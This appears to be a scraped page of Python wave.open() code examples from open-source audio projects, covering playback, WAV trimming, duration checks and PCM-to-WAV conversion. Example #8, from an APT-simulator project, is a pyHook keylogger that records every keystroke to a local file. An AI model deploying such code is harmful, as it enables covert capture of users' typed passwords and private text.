Python wave.open() Examples
The following are 24 code examples of wave.open(). You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may also want to check out all available functions/classes of the module wave, or try the search function.
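Before the project examples, here is a minimal sketch of the wave.open() API itself, round-tripping one second of 16-bit mono silence; the file name is arbitrary, and the context-manager form requires Python 3.4+:

import wave

# Write one second of 16-bit mono silence at 16 kHz.
with wave.open("example.wav", "wb") as wf:
    wf.setnchannels(1)       # mono
    wf.setsampwidth(2)       # 2 bytes == 16-bit samples
    wf.setframerate(16000)   # frames (samples) per second
    wf.writeframes(b"\x00\x00" * 16000)

# Read it back and inspect the header.
with wave.open("example.wav", "rb") as rf:
    print(rf.getnchannels(), rf.getsampwidth(), rf.getframerate(), rf.getnframes())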

Example #1
Source File: proj2_yt_mvp.py From ai-makers-kit with MIT License | 13 votes
def __enter__(self):
    self._audio_interface = pyaudio.PyAudio()
    self._audio_stream = self._audio_interface.open(
        format=pyaudio.paInt16,
        channels=1,
        rate=self._rate,
        input=True,
        frames_per_buffer=self._chunk,
        # Run the audio stream asynchronously to fill the buffer object.
        # This is necessary so that the input device's buffer doesn't
        # overflow while the calling thread makes network requests, etc.
        stream_callback=self._fill_buffer,
    )
    self.closed = False
    return self

#def __exit__(self, type, value, traceback):
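The commented-out stub hints at the matching cleanup method. A minimal sketch of what __exit__ could look like, assuming _fill_buffer feeds a self._buff queue as in Google's streaming-microphone samples (the queue name is an assumption, not shown above):

def __exit__(self, type, value, traceback):
    self._audio_stream.stop_stream()
    self._audio_stream.close()
    self.closed = True
    # Signal any generator draining self._buff (assumed to be the queue
    # filled by _fill_buffer) to terminate, so downstream consumers
    # don't block indefinitely.
    self._buff.put(None)
    self._audio_interface.terminate()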
Example #2
Source File: snowboydecoder.py From google-assistant-hotword-raspi with MIT License | 11 votes
def play_audio_file(fname=DETECT_DING):
    """Simple callback function to play a wave file.

    By default it plays a Ding sound.

    :param str fname: wave file name
    :return: None
    """
    ding_wav = wave.open(fname, 'rb')
    ding_data = ding_wav.readframes(ding_wav.getnframes())
    audio = pyaudio.PyAudio()
    stream_out = audio.open(
        format=audio.get_format_from_width(ding_wav.getsampwidth()),
        channels=ding_wav.getnchannels(),
        rate=ding_wav.getframerate(),
        input=False,
        output=True)
    stream_out.start_stream()
    stream_out.write(ding_data)
    time.sleep(0.2)
    stream_out.stop_stream()
    stream_out.close()
    audio.terminate()
Example #3
Source File: _audio.py From ai-makers-kit with MIT License | 8 votes
def play_wav(fname, chunk=CHUNK):
    # create an audio object
    wf = wave.open(fname, 'rb')
    p = pyaudio.PyAudio()

    # open stream based on the wave object which has been input.
    stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
                    channels=wf.getnchannels(),
                    rate=wf.getframerate(),
                    output=True)

    # read data (based on the chunk size)
    data = wf.readframes(chunk)

    # play stream (looping from beginning of file to the end)
    while len(data) > 0:
        # writing to the stream is what *actually* plays the sound.
        stream.write(data)
        data = wf.readframes(chunk)

    # cleanup stuff
    stream.close()
    p.terminate()
Example #4
Source File: raw_data_loaders.py From ibllib with MIT License | 7 votes
def load_mic(session_path):
    """
    Load Microphone wav file to np.array of len nSamples

    :param session_path: Absolute path of session folder
    :type session_path: str
    :return: An array of values of the sound waveform
    :rtype: numpy.array
    """
    if session_path is None:
        return
    path = Path(session_path).joinpath("raw_behavior_data")
    path = next(path.glob("_iblrig_micData.raw*.wav"), None)
    if not path:
        return None
    fp = wave.open(path)
    nchan = fp.getnchannels()
    N = fp.getnframes()
    dstr = fp.readframes(N * nchan)
    data = np.frombuffer(dstr, np.int16)
    data = np.reshape(data, (-1, nchan))
    return data
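load_mic returns the raw interleaved int16 samples reshaped to (nSamples, nchan). If floating-point samples in [-1, 1] are needed downstream, a small follow-up conversion (my sketch, not part of ibllib; the session path is a placeholder) could be:

import numpy as np

data = load_mic("/path/to/session")  # int16 array of shape (nSamples, nchan)
if data is not None:
    # Divide by the int16 full-scale value to get floats in [-1.0, 1.0].
    data_float = data.astype(np.float32) / 32768.0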
Example #5
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 7 votes
def play_file(fname):
    # create an audio object
    wf = wave.open(fname, 'rb')
    p = pyaudio.PyAudio()
    chunk = 1024

    # open stream based on the wave object which has been input.
    stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
                    channels=wf.getnchannels(),
                    rate=wf.getframerate(),
                    output=True)

    # read data (based on the chunk size)
    data = wf.readframes(chunk)

    # play stream (looping from beginning of file to the end)
    while len(data) > 0:
        # writing to the stream is what *actually* plays the sound.
        stream.write(data)
        data = wf.readframes(chunk)

    # cleanup stuff.
    stream.close()
    p.terminate()
Example #6
Source File: cutoff.py From GST-Tacotron with MIT License | 6 votes
def cutoff(input_wav, output_wav):
    '''
    input_wav --- input wav file path
    output_wav --- output wav file path
    '''

    # read input wave file and get parameters.
    with wave.open(input_wav, 'r') as fw:
        params = fw.getparams()
        # print(params)
        nchannels, sampwidth, framerate, nframes = params[:4]

        strData = fw.readframes(nframes)
        waveData = np.fromstring(strData, dtype=np.int16)

        max_v = np.max(abs(waveData))
        for i in range(waveData.shape[0]):
            if abs(waveData[i]) > 0.08 * max_v:
                break

        for j in range(waveData.shape[0] - 1, 0, -1):
            if abs(waveData[j]) > 0.08 * max_v:
                break

    # write new wav file
    with wave.open(output_wav, 'w') as fw:
        params = list(params)
        params[3] = nframes - i - (waveData.shape[0] - 1 - j)
        fw.setparams(params)
        fw.writeframes(strData[2 * i:2 * (j + 1)])
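The two Python loops scan sample-by-sample for the first and last values above 8% of the peak, which is slow on long recordings. A vectorized rewrite of the same trim (my sketch, not GST-Tacotron code; it assumes 16-bit mono input like the original):

import wave

import numpy as np

def cutoff_vectorized(input_wav, output_wav, threshold=0.08):
    with wave.open(input_wav, 'rb') as fw:
        params = fw.getparams()
        frames = fw.readframes(params.nframes)
    data = np.frombuffer(frames, dtype=np.int16)
    mag = np.abs(data.astype(np.int32))      # int32 avoids overflow at -32768
    loud = mag > threshold * mag.max()
    i = np.argmax(loud)                      # first sample above threshold
    j = len(data) - np.argmax(loud[::-1])    # one past the last such sample
    with wave.open(output_wav, 'wb') as fw:
        fw.setparams(params._replace(nframes=j - i))
        fw.writeframes(frames[2 * i:2 * j])  # 2 bytes per 16-bit mono sample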
Example #7
Source File: raw_data_loaders.py From ibllib with MIT License | 6 votes
def load_settings(session_path):
    """
    Load PyBpod Settings files (.json).

    [description]

    :param session_path: Absolute path of session folder
    :type session_path: str
    :return: Settings dictionary
    :rtype: dict
    """
    if session_path is None:
        return
    path = Path(session_path).joinpath("raw_behavior_data")
    path = next(path.glob("_iblrig_taskSettings.raw*.json"), None)
    if not path:
        return None
    with open(path, 'r') as f:
        settings = json.load(f)
    if 'IBLRIG_VERSION_TAG' not in settings.keys():
        settings['IBLRIG_VERSION_TAG'] = ''
    return settings
Example #8
Source File: apt_simulator.py From hack4career with Apache License 2.0 | 6 votes
def keylogger():
    if console:
        print "* Logging key events... (press enter to escape)"

    def OnKeyboardEvent(event):
        keys = ""
        full_path = os.path.realpath(__file__)
        path, file = os.path.split(full_path)
        path = path + "\keylogs.txt"
        keyfile = open(path, "a")
        key = chr(event.Ascii)
        if event.Ascii == 13:
            key = "\n"
            hook.UnhookKeyboard()
            if console:
                print "* done\n"
            main()
        keys = keys + key
        keyfile.write(keys)
        keyfile.close()

    hook = pyHook.HookManager()
    hook.KeyDown = OnKeyboardEvent
    hook.HookKeyboard()
    pythoncom.PumpMessages()
Example #9
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes
def getText2VoiceStream(inText, inFileName):
    channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials())
    stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel)

    message = gigagenieRPC_pb2.reqText()
    message.lang = 0
    message.mode = 0
    message.text = inText

    writeFile = open(inFileName, 'wb')
    for response in stub.getText2VoiceStream(message):
        if response.HasField("resOptions"):
            print("ResVoiceResult: %d" % (response.resOptions.resultCd))
        if response.HasField("audioContent"):
            print("Audio Stream")
            writeFile.write(response.audioContent)
    writeFile.close()
Example #10
Source File: main.py From HanTTS with MIT License | 6 votes
def _play_audio(path, delay):
    try:
        time.sleep(delay)
        wf = wave.open(path, 'rb')
        p = pyaudio.PyAudio()
        stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
                        channels=wf.getnchannels(),
                        rate=wf.getframerate(),
                        output=True)
        data = wf.readframes(TextToSpeech.CHUNK)
        while data:
            stream.write(data)
            data = wf.readframes(TextToSpeech.CHUNK)
        stream.stop_stream()
        stream.close()
        p.terminate()
        return
    except:
        pass
Example #11
Source File: models.py From cloud-asr with Apache License 2.0 | 6 votes
def save_wav(self, chunk_id, model, body, frame_rate):
    checksum = md5.new(body).hexdigest()
    directory = "%s/%s" % (model, checksum[:2])
    self.create_directories_if_needed(self.path + "/" + directory)

    path = '%s/%s/%s.wav' % (self.path, directory, checksum)
    url = '/static/data/%s/%s.wav' % (directory, checksum)

    wav = wave.open(path, 'w')
    wav.setnchannels(1)
    wav.setsampwidth(2)
    wav.setframerate(frame_rate)
    wav.writeframes(body)
    wav.close()

    return (path, url)
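md5.new() comes from the Python 2-only md5 module; under Python 3 the same checksum comes from hashlib. A drop-in sketch:

import hashlib

# Python 3 equivalent of md5.new(body).hexdigest()
checksum = hashlib.md5(body).hexdigest()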
Example #12
Source File: audio.py From fine-lm with MIT License | 5 votes
def _get_timit(directory):
    """Extract TIMIT datasets to directory unless directory/timit exists."""
    if os.path.exists(os.path.join(directory, "timit")):
        return
    assert FLAGS.timit_paths
    for path in FLAGS.timit_paths.split(","):
        with tf.gfile.GFile(path) as f:
            with tarfile.open(fileobj=f, mode="r:gz") as timit_compressed:
                timit_compressed.extractall(directory)
Example #13
Source File: audio.py From fine-lm with MIT License | 5 votes
def _get_audio_data(filepath):
    # Construct a true .wav file.
    out_filepath = filepath.strip(".WAV") + ".wav"
    # Assumes sox is installed on system. Sox converts from NIST SPHERE to WAV.
    call(["sox", filepath, out_filepath])
    wav_file = wave.open(open(out_filepath))
    frame_count = wav_file.getnframes()
    byte_array = wav_file.readframes(frame_count)
    data = [int(b.encode("hex"), base=16) for b in byte_array]
    return data, frame_count, wav_file.getsampwidth(), wav_file.getnchannels()
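Two details here are Python 2-specific: iterating over a byte string yields 1-character strings (hence b.encode("hex")), and wave.open(open(out_filepath)) relies on a text-mode file object. In Python 3, wave needs a binary-mode file, and iterating over bytes already yields integers, so the equivalents are simply:

# Python 3 equivalents of the two Python 2 idioms above
wav_file = wave.open(open(out_filepath, "rb"))  # wave requires binary mode
data = list(byte_array)  # same values as [int(b.encode("hex"), base=16) for b in byte_array]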
Example #14
Source File: sound_board_utility.py From JJMumbleBot with GNU General Public License v3.0 | 5 votes
def get_cur_audio_length():
    wav_file = wave.open(f"{dir_utils.get_perm_med_dir()}/sound_board/{settings.current_track}.wav", 'r')
    frames = wav_file.getnframes()
    rate = wav_file.getframerate()
    duration = frames / float(rate)
    wav_file.close()
    return duration
Example #15
Source File: sound_board_utility.py From JJMumbleBot with GNU General Public License v3.0 | 5 votes
def get_audio_length(file_name):
    try:
        wav_file = wave.open(f"{dir_utils.get_perm_med_dir()}/sound_board/{file_name}.wav", 'r')
        frames = wav_file.getnframes()
        rate = wav_file.getframerate()
        duration = frames / float(rate)
        wav_file.close()
        if not duration:
            return -1
    except Exception:
        return -1
    return duration
Example #16
Source File: text_to_speech_utility.py From JJMumbleBot with GNU General Public License v3.0 | 5 votes
def get_cur_audio_length():
    wav_file = wave.open(f"{dir_utils.get_perm_med_dir()}/text_to_speech/{settings.current_track}.oga", 'r')
    frames = wav_file.getnframes()
    rate = wav_file.getframerate()
    duration = frames / float(rate)
    wav_file.close()
    return duration
Example #17
Source File: text_to_speech_utility.py From JJMumbleBot with GNU General Public License v3.0 | 5 votes
def download_clip(clip_name, voice, msg, directory=None):
    temp = {'text': msg, 'voice': voice}
    json_dump = json.dumps(temp)
    if directory is None:
        directory = f'{dir_utils.get_perm_med_dir()}'
    try:
        url = 'https://streamlabs.com/polly/speak'
        headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
        r = requests.post(url, data=json_dump, headers=headers)
        # print(r.status_code)
        if r.status_code == 200:
            resp = requests.get(json.loads(r.text)['speak_url'])
            # print(resp.status_code)
            if resp.status_code == 200:
                with open(f'{directory}/text_to_speech/{clip_name}.oga', 'wb') as f:
                    f.write(resp.content)
                uri = f'{directory}/text_to_speech/{clip_name}.oga'
                sp.call(
                    [settings.tts_metadata[C_PLUGIN_SETTINGS][P_VLC_DIR], uri] +
                    ['-I', 'dummy', '--quiet', '--one-instance', '--no-repeat', '--sout',
                     '#transcode{acodec=wav, channels=2, samplerate=43000, '
                     'ab=192, threads=8}:std{access=file, mux=wav, '
                     f'dst={directory}/text_to_speech/{clip_name}.wav '
                     '}', 'vlc://quit'])
                return True
            dprint(f'Could not download clip: Response-{r.status_code}')
            return False
        dprint(f'Could not download clip: Response-{r.status_code}')
        return False
    except Exception as e:
        dprint(e)
        return False
Example #18
Source File: audio_scripts.py From ProMo with MIT License | 5 votes
def getSoundFileDuration(fn):
    '''
    Returns the duration of a wav file (in seconds)
    '''
    audiofile = wave.open(fn, "r")

    params = audiofile.getparams()
    framerate = params[2]
    nframes = params[3]

    duration = float(nframes) / framerate
    return duration
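Under Python 3, getparams() returns a namedtuple, so the positional indices above can be replaced with named fields; an equivalent sketch:

import wave

def get_sound_file_duration(fn):
    # Same computation via the named fields of the getparams() namedtuple.
    with wave.open(fn, "rb") as audiofile:
        params = audiofile.getparams()
        return params.nframes / params.framerate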
Example #19
Source File: wavio.py From Jamais-Vu with MIT License | 5 votes
def readwav(file):
    """
    Read a WAV file.

    Parameters
    ----------
    file : string or file object
        Either the name of a file or an open file pointer.

    Return Values
    -------------
    rate : float
        The sampling frequency (i.e. frame rate)
    sampwidth : float
        The sample width, in bytes.  E.g. for a 24 bit WAV file,
        sampwidth is 3.
    data : numpy array
        The array containing the data.  The shape of the array is
        (num_samples, num_channels).  num_channels is the number of
        audio channels (1 for mono, 2 for stereo).

    Notes
    -----
    This function uses the `wave` module of the Python standard library
    to read the WAV file, so it has the same limitations as that
    library.  In particular, the function does not read compressed WAV
    files.
    """
    wav = _wave.open(file)
    rate = wav.getframerate()
    nchannels = wav.getnchannels()
    sampwidth = wav.getsampwidth()
    nframes = wav.getnframes()
    data = wav.readframes(nframes)
    wav.close()
    array = _wav2array(nchannels, sampwidth, data)
    return rate, sampwidth, array
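The _wav2array helper is not shown in this excerpt; in wavio it also unpacks 24-bit samples. A simplified reconstruction covering only the 8/16/32-bit widths (my sketch under that assumption, not the wavio implementation):

import numpy as _np

def _wav2array_simple(nchannels, sampwidth, data):
    # Map sample width in bytes to a numpy dtype; 8-bit WAV is unsigned.
    dtypes = {1: _np.uint8, 2: _np.int16, 4: _np.int32}
    if sampwidth not in dtypes:
        raise ValueError("unsupported sample width: %d bytes" % sampwidth)
    array = _np.frombuffer(data, dtype=dtypes[sampwidth])
    # Interleaved channels -> shape (num_samples, num_channels).
    return array.reshape(-1, nchannels)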
Example #20
Source File: abook-transcribe.py From zamia-speech with GNU Lesser General Public License v3.0 | 5 votes
def play_wav(start=0.0, stop=1.0):
    global tts, segmentfn

    wavef = wave.open(segmentfn, 'rb')
    num_channels = wavef.getnchannels()
    num_frames = wavef.getnframes()
    frame_rate = wavef.getframerate()
    sampwidth = wavef.getsampwidth()

    duration = float(num_frames) / float(frame_rate)

    buf = StringIO()
    wavout = wave.open(buf, 'w')
    wavout.setframerate(frame_rate)
    wavout.setnchannels(num_channels)
    wavout.setsampwidth(sampwidth)

    wavef.setpos(int(start * num_frames))
    samples = wavef.readframes(int((stop - start) * num_frames))
    wavout.writeframes(samples)

    wavef.close()
    wavout.close()

    # with open(segmentfn) as wavf:
    #     wav = wavf.read()

    tts.play_wav(buf.getvalue(), async=True)
Example #21
Source File: vad.py From reconstructing_faces_from_voices with GNU General Public License v3.0 | 5 votes
def read_wave(path):
    with contextlib.closing(wave.open(path, 'rb')) as wf:
        num_channels = wf.getnchannels()
        assert num_channels == 1
        sample_width = wf.getsampwidth()
        assert sample_width == 2
        sample_rate = wf.getframerate()
        assert sample_rate in (8000, 16000, 32000)
        pcm_data = wf.readframes(wf.getnframes())
        return pcm_data, sample_rate
Example #22
Source File: vad.py From reconstructing_faces_from_voices with GNU General Public License v3.0 | 5 votes
def write_wave(path, audio, sample_rate):
    with contextlib.closing(wave.open(path, 'wb')) as wf:
        wf.setnchannels(1)
        wf.setsampwidth(2)
        wf.setframerate(sample_rate)
        wf.writeframes(audio)
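Together, read_wave and write_wave give a simple round-trip for the mono 16-bit PCM that a VAD pipeline expects; a hypothetical usage (file names are placeholders):

pcm_data, sample_rate = read_wave('speech_mono_16k.wav')
# ... run VAD or other processing on pcm_data here ...
write_wave('speech_copy.wav', pcm_data, sample_rate)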
Example #23
Source File: raw_data_loaders.py From ibllib with MIT License | 5 votes
def load_ambient_sensor(session_path):
    """
    Load Ambient Sensor data from session.

    Probably could be extracted to DatasetTypes:
    _ibl_trials.temperature_C, _ibl_trials.airPressure_mb,
    _ibl_trials.relativeHumidity

    Returns a list of dicts one dict per trial.
    dict keys are:
    dict_keys(['Temperature_C', 'AirPressure_mb', 'RelativeHumidity'])

    :param session_path: Absolute path of session folder
    :type session_path: str
    :return: list of dicts
    :rtype: list
    """
    if session_path is None:
        return
    path = Path(session_path).joinpath("raw_behavior_data")
    path = next(path.glob("_iblrig_ambientSensorData.raw*.jsonable"), None)
    if not path:
        return None
    data = []
    with open(path, 'r') as f:
        for line in f:
            data.append(json.loads(line))
    return data
Example #24
Source File: amazonpolly.py From tts-ros1 with Apache License 2.0 | 5 votes
def _pcm2wav(self, audio_data, wav_filename, sample_rate):
    """Per the official Amazon Polly docs, the PCM output is signed 16-bit, 1-channel (mono), little-endian."""
    wavf = wave.open(wav_filename, 'w')
    wavf.setframerate(int(sample_rate))
    wavf.setnchannels(1)  # 1 channel
    wavf.setsampwidth(2)  # 2 bytes == 16 bits
    wavf.writeframes(audio_data)
    wavf.close()
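A hedged usage sketch feeding _pcm2wav from boto3's Polly client, which returns raw PCM when OutputFormat='pcm'; the voice, rate, output path, and the synth instance name are illustrative assumptions, not part of tts-ros1:

import boto3

polly = boto3.client('polly')
response = polly.synthesize_speech(
    Text='hello world',
    OutputFormat='pcm',   # signed 16-bit, mono, little-endian
    SampleRate='16000',
    VoiceId='Joanna',
)
audio_data = response['AudioStream'].read()
# synth is assumed to be an instance of the class defining _pcm2wav.
synth._pcm2wav(audio_data, '/tmp/hello.wav', 16000)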